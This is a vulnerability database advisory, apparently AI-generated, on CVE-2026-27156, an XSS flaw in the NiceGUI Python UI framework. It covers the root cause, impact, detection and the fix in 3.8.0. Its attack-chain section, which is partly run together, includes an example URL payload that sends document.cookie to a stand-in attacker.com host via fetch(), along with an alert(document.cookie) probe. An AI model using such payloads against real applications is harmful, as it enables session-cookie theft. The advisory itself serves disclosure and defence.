
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-27156 is a Cross-Site Scripting (XSS) vulnerability in NiceGUI, a Python-based UI framework, affecting all versions up to and including 3.7.1. Multiple NiceGUI APIs — including Element.run_method(), AgGrid.run_grid_method(), EChart.run_chart_method(), and others — use an eval() fallback in the JavaScript-side runMethod() function, and additionally use unsafe string interpolation instead of json.dumps() for method/property names. This allows an attacker to inject arbitrary JavaScript that executes in a victim's browser when user-controlled input is passed as a method name. The vulnerability was published on February 24, 2026, and carries a CVSS v3.1 base score of 6.1 (Medium) (GitHub Advisory, NiceGUI Security Advisory).
The root cause is twofold and classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). First, the JavaScript-side runMethod() function in nicegui.js used eval() as a fallback when a method name was not found on the target element, allowing arbitrary JavaScript expressions to be evaluated. Second, Element.run_method() and Element.get_computed_prop() in element.py used Python f-string interpolation (e.g., f'return runMethod({self.id}, "{name}"...')) instead of json.dumps() for the method/property name, enabling quote injection to break out of the string context. An attacker crafts a malicious URL with a JavaScript payload as a query parameter (e.g., /?method=alert(document.cookie)); if the application passes this parameter directly to any of the affected APIs, the payload is transmitted to the client via WebSocket and executed via eval(). No authentication or special privileges are required, but user interaction (visiting the crafted URL) is needed (GitHub Advisory, Patch Commit).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim's browser, enabling cookie and session token theft, DOM manipulation (e.g., injecting phishing forms), and performing unauthorized actions on behalf of the victim user. The vulnerability has a changed scope, meaning the impact extends beyond the vulnerable NiceGUI component to affect the user's browser environment and any data accessible within it. Availability is not directly impacted, but confidentiality and integrity are both affected at a low level per the CVSS scoring (GitHub Advisory, NiceGUI Security Advisory).
There is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation at this time (Feedly). No threat actor attribution has been reported. The EPSS score is approximately 0.029–0.047%, placing it in the 15th percentile for exploitation likelihood within 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires user interaction (a victim must visit a crafted URL or interact with attacker-controlled input), which limits opportunistic mass exploitation (GitHub Advisory).
Element.run_method(), AgGrid.run_grid_method(), or similar affected methods.alert(document.cookie) or a more sophisticated payload to exfiltrate session tokens to an attacker-controlled server.https://target-app.example.com/?method=fetch('https://attacker.com/?c='+document.cookie), targeting an endpoint where the application uses the parameter as a method name.runMethod() in nicegui.js invokes eval(method_name), executing the injected JavaScript in the victim's browser.alert(, fetch(, document.cookie, arrow functions =>); unexpected outbound HTTP requests from victim browsers to unknown external domains shortly after page load.run_method(), run_grid_method(), or similar APIs; browser console errors referencing eval() execution or unexpected JavaScript evaluation.?method=alert(...)) in web server access logs; unexpected DOM modifications or injected content reported by users.Upgrade NiceGUI to version 3.8.0 or later, which removes the eval() fallback from runMethod() in nicegui.js and replaces string interpolation with json.dumps() for proper escaping of method/property names (Patch Commit). If immediate patching is not possible, implement strict server-side input validation and sanitization for all user-controlled inputs passed to the affected APIs, and avoid passing untrusted input as method names. As a defense-in-depth measure, implement a Content Security Policy (CSP) header to restrict JavaScript execution. Note that code previously using JavaScript function expressions as method names (e.g., grid.run_grid_method('g => g.getDisplayedRowAtIndex(0).data')) must be migrated to use ui.run_javascript() instead after upgrading (GitHub Advisory).
The vulnerability was reported by security researcher anuraagbaishya, analyzed by evnchn, and remediated by NiceGUI maintainer falkoschindler, who published the advisory and patch on February 24, 2026 (NiceGUI Security Advisory). A technical write-up was published at Infinit Security shortly after disclosure (Infinit Security). No significant broader media coverage or notable social media discussion has been identified beyond standard vulnerability database aggregation.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."